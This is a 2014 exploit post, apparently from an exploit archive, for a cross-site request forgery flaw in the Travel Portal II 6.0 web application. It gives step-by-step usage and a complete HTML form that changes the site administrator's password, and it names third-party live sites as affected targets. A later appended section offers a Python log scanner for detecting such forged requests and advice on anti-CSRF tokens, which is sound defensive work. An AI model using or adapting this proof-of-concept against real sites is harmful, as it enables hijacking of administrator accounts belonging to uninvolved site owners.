
Travel Portal II 6.0 Cross Site Request Forgery

Posted on 13 September 2014

Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com - http://www.cyber-warrior.org/100379
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x.. Apologies to anyone we forgot..
############################################################
Turkey Security Group 'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Travel Portal II (6.0)
|~Affected Version : II 6.0 and predecessors.. / all versions
|~Official Software Web: http://www.tourismscripts.com/scripts/scripts/hotel-cars-flights-villas-flats-custom-potal-script.html
|~PRICE : 349 Euro
|~RISK : High
|~Google Keyword/Dorks : N/A
|~Tested On : Kali Linux, Mozilla Firefox
####################INFO################################
The admin password can be changed easily..
####################Usage Exploit########################
Exploitation
Edit exploit.html to point at the target website..
Open exploit.html in your browser..
Choose your new password.
Go to the admin panel..
####################Example affected sites & Tested on#####
http://travelportal.tourismscripts.com/ ( Official Demo )
http://almarjanmakkah.com
http://www.istanbulairportal.com

==============================================================================
Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit ; exploit.html
==============================================================================
<h3>Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploited by KnocKout</h3>
<!-- Fields posted to admin.php: admin_id, admin_name, password, submit -->
<form method="post" action="http://[VICTIM]/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<table>
<tr>
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"></td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40"></td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</tr>
</table>
</form>
=================================================================================
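A detection sketch for the request shown in the PoC, added here as an example and not part of the original advisory: it scans web-server access logs in combined format for POSTs to `/admin/admin.php` whose Referer is missing or points to another host. The hostname `portal.example`, the function name and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" format: ip - user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ADMIN_ENDPOINT = "/admin/admin.php"  # form action used by the PoC on this page


def suspicious_admin_posts(lines, site_host):
    """Return (time, ip, reason) for POSTs to the admin endpoint that did not
    come from a page on site_host (assumption: the portal's own hostname)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        if urlsplit(m["path"]).path != ADMIN_ENDPOINT:
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            # A form opened from a local file or a no-referrer page sends none.
            findings.append((m["time"], m["ip"], "missing referer"))
            continue
        ref_host = (urlsplit(referer).hostname or "").lower()
        if ref_host != site_host.lower():
            findings.append((m["time"], m["ip"], f"cross-site referer: {ref_host}"))
    return findings


# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Sep/2014:10:01:02 +0000] "GET /admin/admin.php HTTP/1.1" 200 5120 "https://portal.example/admin/index.php" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Sep/2014:10:02:10 +0000] "POST /admin/admin.php HTTP/1.1" 200 312 "https://portal.example/admin/admin.php" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Sep/2014:11:15:40 +0000] "POST /admin/admin.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [13/Sep/2014:11:20:05 +0000] "POST /admin/admin.php HTTP/1.1" 200 312 "http://other.example/exploit.html" "Mozilla/5.0"',
    '203.0.113.20 - - [13/Sep/2014:11:21:00 +0000] "POST /index.php HTTP/1.1" 200 900 "http://other.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in suspicious_admin_posts(SAMPLE_LOG, "portal.example"):
        print(finding)
```

Browsers and proxies can strip the Referer header for legitimate reasons, so a "missing referer" hit is a lead to correlate with subsequent admin logins rather than proof of a forged request. The durable fix is server-side: a per-session anti-CSRF token on the form and a required current-password field.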

 
